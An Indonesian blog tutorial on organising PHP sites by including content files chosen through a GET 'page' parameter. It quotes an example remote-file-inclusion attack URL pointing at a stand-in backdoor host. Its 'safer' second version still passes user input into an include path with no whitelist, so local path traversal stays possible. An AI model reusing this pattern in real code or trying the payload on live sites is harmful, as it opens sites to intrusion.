Memanfaatkan Include di PHP


oke setelah saya kemarin saya berdiskusi dengan teman-teman 1 grup saya, saya jadi ingat waktu TA ketika saya MASIH bersekolah (sekarang dah mau LULUS #Amin). Kenapa sih kalau bikin web kok 1 file 1 desain alias 1 file itu lengkap semuanya, padahal itu kan bisa di minimalisir. Sepengalaman saya bagi para nub mereka terlalu berfikir gampang "yang penting jadi ga masalah caranya" trus ada lagi "yang penting output" beda sama yang udah master ni hehehe. Padahal ketika semua itu bisa mereka minimalisir, itu bisa memudahkan mereka untuk mendevelopnya, tidak kesulitas musti bikin desainnya dari awal terus jika desainnya berubah 1 harus ngerubah semuanya. Repot kan?? Dan ada lagi yang paling saya ga suka nih, ga peduli masih sekolah atau udah kuliah ternyata ada aja yang codingnya berantakan alias ga rapi. Semua tabnya ga ada yang beraturan jadi terkadang sulit banget baca codingnya.

Gimana sih caranya memilimalisirnya?
Oke cara 1 : kalian bisa pake IF / Select Case yang kemudian di dalamnya nanti ada code include untuk menginclude kontennya aja, jadi IF / Select Case di sini ditempatkan di body atau tempat kontent desain web. Langsung aja contoh ya, soalnya kalo kebanyakan teori pada ngga ngerti :D.

<html>
 <head>
  <title>Percobaan IF 1</title>
 </head>
 <body>
  <!-- tempat awal konten -->
  <?php
   $menu = (isset($_GET['page'])) ? $_GET['page'] : "";
   #cara di atas sering saya gunakan sebagai parameter default ketika $_GET['page'] tidak ada
   if($menu == "about"){
    include "cont/about.php";
   }else{
    include "cont/index.php";
   }
  ?>
  <!-- tempat akhir konten -->
 </body>
</html>

Itu saya kasih contoh simpel, terus kalau kalian coding harus rapi ya kyk coding di atas, biar enak dibaca. Untuk select case kondisinya sama kok, tinggal ganti codingnya aja dikit dan menyesuaikan. Dengan cara diatas lebih mudah kan, jadi kalo mau rubah desain tinggal di index atau halaman itu saja, sedangkan konten tinggal edit yang ada di dalam folder "cont". Gmn? mudah ga? Pastinya lebih mudah dari pada 1 file 1 desain.

Cara 2 : cara ini tidak berbeda dengan cara pertama hanya saja ini adalah kembangan saya dari yang di atas. Langsung aja di simak codingannya :

<html>
 <head>
  <title>Percobaan IF 2</title>
 </head>
 <body>
  <!-- tempat awal konten -->
  <?php
   $menu = (isset($_GET['page'])) ? $_GET['page'] : "index";
   #cara di atas sering saya gunakan sebagai parameter default ketika $_GET['page'] tidak ada
   if(is_file("cont/{$menu}.php")){
    include "cont/{$menu}.php";
   }else{
    echo "Menunya ga ada gan.";
   }
  ?>
  <!-- tempat akhir konten -->
 </body>
</html>

nah untuk cara ini kalian jangan pernah menggunakan - include "$menu.php"; -. Kenapa?? dengan cara itu nanti hacker banyak yang jebol. Gmn caranya?? Hacker langsung aja masukin link "index?page=http://backdoor.com/backdoor.txt", dengan itu maka habislah sudah web anda. Sang hacker masuk ke web anda dengan backdoor dan vuln / celah yang telah anda sediakan. Pastikan kalian menambahkan 1 folder ke dalam biar nantinya juga enak untuk mendevelopnya lagi, dan untungnya ada lagi. Kalian tidak perlu mengedit coding PHPnya kalo mau bikin menu baru, tinggal bikin link trus filenya juga, selesai menu barunya. Beda dengan cara yang 1, ketika kalian ingin menambahkan 1 menu baru kalian harus menambahkan 1 kondisi untuk 1 menu dan 1 file juga pastinya.

Sampai di sini saja sedikit berbagi dari saya. Jika ada lebihnya tolong di kembalikan dan jika ada kurang mohon di iklas kan hahahaha #becanda.

Selamat pagi dan salam hangat
Silahkan menikmati bahan diskusi di pagi hari agar hari anda tidak membosankan.
Jika ada pertanyaan mengenai web khususnya PHP silahkan tanyakan di grup saya di link berikut : https://www.facebook.com/groups/ind.linux/

By : L Shaf.

Komentar

  1. bermanfaat nih sob.
    comment back ya n follow jg ya.. :D

    http://dyns-cyber.blogspot.com/

    BalasHapus

Posting Komentar

Postingan populer dari blog ini

Menampilkan Jam Server dengan Javascript dan PHP

Mind Breaker

数字言語 [Suuji Gengo]